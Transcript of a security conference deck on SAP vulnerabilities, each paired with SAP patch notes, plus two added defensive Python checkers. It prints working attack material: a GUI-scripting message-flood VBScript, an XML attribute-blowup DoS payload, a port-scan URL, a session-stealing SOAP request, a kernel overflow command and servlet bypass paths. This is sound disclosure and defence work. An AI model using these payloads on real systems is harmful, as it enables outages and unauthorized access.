Invest in security to secure investments
SAP (In)Security: New and Best
Alexander Polyakov. CTO at ERPScan
About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 Awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
What is SAP?
Shut up And Pay
Really
• The most popular business application
• More than 120000 customers
• 74% of Forbes 500
Agenda
• Intro
• SAP security history
• SAP on the Internet
• Most popular SAP issues (OLD)
• Top 10 latest interesting attacks (NEW)
• DEMOs
• Conclusion
3 areas of SAP Security
2010 – Application platform security: prevents unauthorized access by both insiders and remote attackers. Solution: Vulnerability Assessment and Monitoring
2008 – ABAP Code security: prevents attacks or mistakes made by developers. Solution: Code audit
2002 – Business logic security (SOD): prevents attacks or mistakes made. Solution: GRC
Talks about SAP security
[Chart: number of talks about SAP security per year, 2006–2012]
Most popular: • BlackHat • HITB • Troopers • RSA • Source • DeepSec • etc.
SAP Security notes
[Chart: number of SAP Security notes per year, 2001–2012]
By April 26, 2012, a total of 2026 notes
SAP vulnerabilities by type
[Bar chart; stats from 1Q 2012, 1Q 2010 and 4Q 2009]
1 - Directory Traversal
2 - XSS/Unauthorised modification of
3 - Missing Auth check
4 - Information Disclosure
5 - Unauthorized usage of application
6 - Hard-coded credentials
7 - Code injection vulnerability
8 - Verb tampering
9 - Remote Code Execution
10 - Denial of service
11 - BOF
12 - SQL Inj
Top problems by OWASP-EAS (Implementation issues)
• EASAI-1 Lack of patch management
• EASAI-2 Default Passwords for application access
• EASAI-3 SOD conflicts
• EASAI-4 Unnecessary Enabled Application features
• EASAI-5 Open Remote management interfaces
• EASAI-6 Lack of password lockout/complexity checks
• EASAI-7 Insecure options
• EASAI-8 Unencrypted communications
• EASAI-9 Insecure trust relations
• EASAI-10 Guest access
Top problems by BIZEC
• BIZEC TEC-01: Vulnerable Software in Use
• BIZEC TEC-02: Standard Users with Default Passwords
• BIZEC TEC-03: Unsecured SAP Gateway
• BIZEC TEC-04: Unsecured SAP/Oracle authentication
• BIZEC TEC-05: Insecure RFC interfaces
• BIZEC TEC-06: Insufficient Security Audit Logging
• BIZEC TEC-07: Unsecured SAP Message Server
• BIZEC TEC-08: Dangerous SAP Web Applications
• BIZEC TEC-09: Unprotected Access to Administration Services
• BIZEC TEC-10: Insecure Network Environment
• BIZEC TEC-11: Unencrypted Communications
Business Risks
Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing suppliers and customers list
• Stealing HR data
Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations
Fraud
• False transactions
• Modification of master data
• etc.
SAP on the Internet
MYTH: attacks on SAP systems are available only to insiders
• We have collected data about SAP systems on the WEB
• Have various stats by countries, applications, versions
• Information from Google, Shodan, Nmap scan
About 5000 systems including Dispatcher, Message server, SapHostcontrol, Web services
Top 10 vulnerabilities 2011-2012
1. Authentication Bypass via Verb tampering
2. Authentication Bypass via the Invoker servlet
3. Buffer overflow in ABAP Kernel
4. Code execution via TH_GREP
5. MMC read SESSIONID
6. Remote portscan
7. Encryption in SAPGUI
8. BAPI XSS/SMBRELAY
9. XML Blowup DOS
10. GUI Scripting DOS
10 – GUI-Scripting DOS: Description
• SAP users can run scripts which automate their user functions
• A script has the same rights in SAP as the user who launched it
• The security message which is shown to the user can be turned off in the registry
• Almost any user can use SAP Messages (SM02 transaction)
• It is possible to run a DOS attack on any user using a simple script
New
Author: Dmitry Chastukhin (ERPScan)
10 – GUI-scripting: Details
If Not IsObject(application) Then
   Set SapGuiAuto = GetObject("SAPGUI")
   Set application = SapGuiAuto.GetScriptingEngine
End If
If Not IsObject(connection) Then
   Set connection = application.Children(0)
End If
If Not IsObject(session) Then
   Set session = connection.Children(0)
End If
If IsObject(WScript) Then
   WScript.ConnectObject session, "on"
   WScript.ConnectObject application, "on"
End If
Do
   a = a + 1
   session.findById("wnd[0]").maximize
   session.findById("wnd[0]/tbar[0]/okcd").text = "/nsm02"
   session.findById("wnd[0]/tbar[0]/btn[0]").press
   session.findById("wnd[0]/tbar[1]/btn[34]").press
   session.findById("wnd[1]/usr/txtEMLINE1").text = "hello"
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-APPLSERVER").caretPosition = 0
   session.findById("wnd[1]").sendVKey 4
   session.findById("wnd[2]/usr/lbl[1,3]").setFocus
   session.findById("wnd[2]/usr/lbl[1,3]").caretPosition = 15
   session.findById("wnd[2]").sendVKey 2
   session.findById("wnd[1]/usr/ctxtTEMSG-CLIENT").text = "800"
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").text = "en"
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").setFocus
   session.findById("wnd[1]/usr/ctxtTEMSG-LANGU").caretPosition = 2
   session.findById("wnd[1]/tbar[0]/btn[0]").press
Loop Until a >= 1000
10 – GUI-scripting: Other attacks
Other attacks, like changing banking accounts in LFBK, are also possible
Script can be uploaded using:
• SAPGUI ActiveX vulnerability
• Teensy USB flash
• Any other method of client exploitation
10 – GUI-scripting: Business risks
Ease of exploitation – Medium
Sabotage – High
Espionage – No
Fraud – No
10 – GUI-scripting: Prevention
• SAP GUI Scripting Security Guide
• sapgui/user_scripting = FALSE
• Block registry modification on workstations
9 – XML Blowup DOS: Description
• WEBRFC interface can be used to run RFC functions
• By default any user can have access
• Can execute at least RFC_PING
• SAP NetWeaver is vulnerable to malformed XML packets
• It is possible to run a DOS attack on the server using a simple script
• It is possible to run it over the Internet!
New
Author: Alexey Tyurin (ERPScan)
9 – XML Blowup DOS: Details
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body>
    <m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions"
        a1="" a2="" ... a10000="" > </m:RFC_PING>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
9 – XML Blowup DOS: Business risks
Ease of exploitation – Medium
Espionage – No
Fraud – No
Sabotage – Critical
9 – XML Blowup DOS: Prevention
• Disable WEBRFC
• Prevent unauthorized access to WEBRFC using S_ICF
• Install SAP notes 1543318 and 1469549
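As an added example (not from the deck or from ERPScan), a pre-parse guard that a reverse proxy or WAF in front of WEBRFC could apply: it streams the SOAP envelope with expat and refuses any element carrying more attributes than a budget, so a blown-up RFC_PING like the one above is rejected before any DOM is built. The attribute limit and the sample envelopes are assumptions; a real RFC_PING carries no attributes at all.

```python
import xml.parsers.expat

MAX_ATTRS_PER_ELEMENT = 16  # assumed budget; legitimate RFC_PING needs zero


class AttributeBudgetExceeded(Exception):
    """Raised from the start-element handler to abort streaming early."""


def attribute_budget_ok(envelope: bytes, limit: int = MAX_ATTRS_PER_ELEMENT):
    """Stream `envelope` and stop at the first element that carries more than
    `limit` attributes. Returns (accepted, offending_local_name_or_None).
    Namespace mode makes expat consume xmlns declarations, so only real
    attributes are counted; a non-well-formed document is refused too."""
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_start(name, attrs):
        if len(attrs) > limit:
            # name is "uri localname" in namespace mode; keep the local part
            raise AttributeBudgetExceeded(name.split(" ")[-1])

    parser.StartElementHandler = on_start
    try:
        parser.Parse(envelope, True)
    except AttributeBudgetExceeded as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError:
        return False, "malformed"
    return True, None


def sample_rfc_ping(extra_attrs: int) -> bytes:
    """Constructed test input: the deck's RFC_PING request padded with
    `extra_attrs` dummy attributes (0 reproduces a normal ping)."""
    attrs = " ".join(f'a{i}=""' for i in range(1, extra_attrs + 1))
    return (
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
        "<SOAP-ENV:Body>"
        f'<m:RFC_PING xmlns:m="urn:sap-com:document:sap:rfc:functions" {attrs}>'
        "</m:RFC_PING></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    ).encode()
```

Because expat is streaming, the oversized request is dropped after reading only the first offending start tag, which is the property the guard needs.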
8 – BAPI script injection/hash stealing: Description
• SAP BAPI transaction fails to properly sanitize input
• Possible to inject JavaScript code or a link to a fake SMB server
• SAP GUI clients use Windows, so their credentials will be transferred to the attacker's host
New
Author: Dmitry Chastukhin (ERPScan)
8 – BAPI script injection/hash stealing: Demo
8 – BAPI script injection/hash stealing: Business risks
Ease of exploitation – Low
Sabotage – High
Espionage – High
Fraud – High
7 – SAP GUI bad encryption: Description
• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in a .sap file
• This password uses a byte-XOR algorithm with a "secret" key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted in 1 second
New
Author: Alexey Sintsov (ERPScan)
7 – SAP GUI bad encryption: Demo
7 – SAP GUI bad encryption: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
7 – SAP GUI bad encryption: Prevention
• Disable password storage in GUI
6 – Remote port scan via JSP: Description
• It is possible to scan the internal network from the Internet
• Authentication is not required
• SAP NetWeaver J2EE engine is vulnerable
/ipcpricing/ui/BufferOverview.jsp?
  server=172.16.0.13
  &port=31337
  &password=
  &dispatcher=
  &targetClient=
  &view=
Author: Alexander Polyakov (ERPScan)
6 – Remote port scan via JSP: Demo
[Screenshots: responses for a closed port, an HTTP port and an SAP port]
6 – Remote port scan via JSP: Business risks
Ease of exploitation – High
Espionage – Medium
Fraud – No
Sabotage – Low
6 – Remote port scan via JSP: Prevention
• Install SAP notes: 1548548, 1545883, 1503856, 948851
• Disable unnecessary applications
5 – MMC JSESSIONID stealing: Description
• Remote management of SAP Platform
• By default, many commands go without auth
• Exploits implemented in Metasploit (by ChrisJohnRiley)
• Most of the bugs are information disclosure
• It is possible to find information about JSESSIONID
• Only if trace is ON
Can be authenticated as an existing user remotely
1) Original bug by ChrisJohnRiley
2) JSESSIONID by Alexey Sintsov and Alexey Tyurin (ERPScan)
New
5 – MMC SESSIONID stealing: Details
<?xml version="1.0" encoding="UTF-8" ?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter></filter>
      <language></language>
      <maxentries>100</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
5 – MMC JSESSIONID stealing: Business risks
Espionage – Critical
Sabotage – Medium
Fraud – High
Ease of exploitation – Medium
5 – MMC JSESSIONID stealing: Prevention
• The JSESSIONID by default will not be logged in the log file
• Don't use TRACE_LEVEL = 3 on production systems, or delete traces after use
• Other info: http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
4 – Remote command execution in TH_GREP: Description
• RCE vulnerability in RFC module TH_GREP
• Found by Joris van de Vis
• SAP was not properly patched (1433101)
• We have discovered that the patch can be bypassed in Windows
Original bug by Joris van de Vis (erp-sec)
Bypass by Alexey Tyurin (ERPScan)
4 – RCE in TH_GREP: Details
elseif opsys = 'Windows NT'.
  " Windows branch: the user string is dropped into the command line unescaped
  concatenate '/c:"' string '"' filename into grep_params in character mode.
else. " if linux
  " Linux branch: embedded single quotes are escaped before quoting
  replace all occurrences of '''' in local_string with '''"''"'''.
  concatenate '''' local_string '''' filename into grep_params in character mode.
endif.
4 – RCE in TH_GREP: Demo #1
4 – RCE in TH_GREP: More details
4 ways to execute the vulnerable program:
• Using transaction "SE37"
• Using transaction "SM51" (thanks to Felix Granados)
• Using remote RFC call "TH_GREP"
• Using SOAP RFC call "TH_GREP" via web
4 – RCE in TH_GREP: Demo #2
4 – RCE in TH_GREP: Business risks
Sabotage – Medium
Fraud – High
Espionage – High
Ease of exploitation – Medium
4 – RCE in TH_GREP: Prevention
• Install SAP notes 1580017, 1433101
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for similar vulnerabilities
3 – ABAP Kernel BOF: Description
• Presented by Andreas Wiegenstein at BlackHat EU 2011
• Buffer overflow in SAP kernel function C_SAPGPARAM
• When NAME field is more than 108 chars
• Can be exploited by calling an FM which uses C_SAPGPARAM
• Example of report – RSPO_R_SAPGPARAM
Author: Andreas Wiegenstein (VirtualForge)
3 – ABAP Kernel BOF: Details
> startrfc.exe -3 -h 172.16.0.63 -s 01 -c 000 -u SAP* -p 11111 -F RSPO_R_SAPGPARAM
-E NAME=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -t 4
RFC Call/Exception: SYSTEM_FAILURE
Group Error group 104 Key RFC_ERROR_SYSTEM_FAILURE Message connection closed without message (CM_NO_DATA_RECEIVED)
3 – ABAP Kernel BOF: Business risks
Ease of exploitation – Medium
Espionage – Critical
Fraud – Critical
Sabotage – Critical
3 – ABAP Kernel BOF: Prevention
• Install SAP notes:
  - 1493516 – Correcting buffer overflow in ABAP system call
  - 1487330 – Potential remote code execution in SAP Kernel
• Prevent access to critical transactions and RFC functions
• Check the ABAP code of your Z-transactions for critical calls
2 – Invoker Servlet: Description
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from the application
• Even if it is not declared in WEB.XML
Can be used for auth bypass
2 – Invoker Servlet: Details
<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
What if we call /servlet/com.sap.admin.Critical.Action?
Author: Dmitry Chastukhin (ERPScan)
2 – Invoker servlet: Business risks
Ease of use – Very easy!
Espionage – High
Sabotage – High
Fraud – High
2 – Invoker servlet: Prevention
• Update to the latest patch: 1467771, 1445998
• The "EnableInvokerServletGlobally" property of the servlet_jsp service must be "false"
If you can't install patches for some reason, you can check all WEB.XML files using the ERPScan web.xml scanner or manually.
1 – VERB Tampering
1st Place – Verb Tampering
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restrictedaccess</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>admin</role-name>
  </auth-constraint>
</security-constraint>
What if we use HEAD instead of GET?
Author: Alexander Polyakov (ERPScan)
1st Place – Verb tampering: Details
Remotely without authentication!
• CTC – Secret interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
  – Add users
  – Add to groups
  – Run OS commands
  – Start/Stop J2EE
1 – Verb tampering: Demo
1 – Verb tampering: More details
If patched, can be bypassed by the Invoker servlet!
1 – Verb tampering: Business risks
Espionage – Critical
Sabotage – Critical
Fraud – Critical
Ease of use – Very easy!
1st Place – Verb tampering: Prevention
• Install SAP notes 1503579, 1616259
• Install other SAP notes about Verb Tampering (about 18)
• Scan applications using the ERPScan WEB.XML check tool or manually
• Secure WEB.XML by deleting all <http-method>
• Disable the applications that are not necessary
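As an added example (my own script, not the ERPScan WEB.XML check tool), the manual check described in the Invoker Servlet and Verb Tampering slides: it flags every auth-protected resource collection that enumerates <http-method> (any verb not listed, such as HEAD, falls outside the constraint) and emits the hardened descriptor with those elements deleted. The sample descriptor is the deck's fragment wrapped in a J2EE root; the `{*}` namespace wildcard needs Python 3.8+.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the descriptor fragment from the deck, wrapped in a
# web-app root with the usual default namespace so it parses like a real file.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/j2ee">
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>admin</role-name></auth-constraint>
  </security-constraint>
</web-app>"""


def verb_tampering_findings(web_xml: str) -> list:
    """Return (url-pattern, [methods]) for every auth-protected resource
    collection that lists <http-method>: verbs outside that list are not
    covered by the constraint. '{*}' matches any (or no) namespace."""
    root = ET.fromstring(web_xml)
    findings = []
    for sc in root.findall(".//{*}security-constraint"):
        if sc.find("{*}auth-constraint") is None:
            continue  # no auth required here, so nothing to bypass
        for wrc in sc.findall("{*}web-resource-collection"):
            methods = [m.text.strip() for m in wrc.findall("{*}http-method") if m.text]
            if methods:  # no <http-method> means "all verbs", the safe form
                for up in wrc.findall("{*}url-pattern"):
                    findings.append((up.text.strip(), methods))
    return findings


def harden_web_xml(web_xml: str) -> str:
    """Delete every <http-method> so each constraint applies to all verbs,
    which is the fix the prevention slide recommends."""
    root = ET.fromstring(web_xml)
    for wrc in root.findall(".//{*}web-resource-collection"):
        for m in wrc.findall("{*}http-method"):
            wrc.remove(m)
    return ET.tostring(root, encoding="unicode")
```

Run it over every WEB-INF/web.xml deployed on the J2EE engine; an empty findings list after hardening is the expected result.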
Conclusion
It is possible to be protected from almost all those kinds of issues, and we are working hard with SAP to make it secure
SAP Guides
It's all in your hands
Regular Security assessments
ABAP Code review
Monitoring technical security
Segregation of Duties
Future work
Many of the researched things cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for cooperation. However, if you want to see new demos and 0-days, follow us at @erpscan and attend the future presentations:
• Just4Meeting in July (Portugal)
• BlackHat USA in July (Las Vegas)
Greetz to our crew who helped: Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeniy Neelov.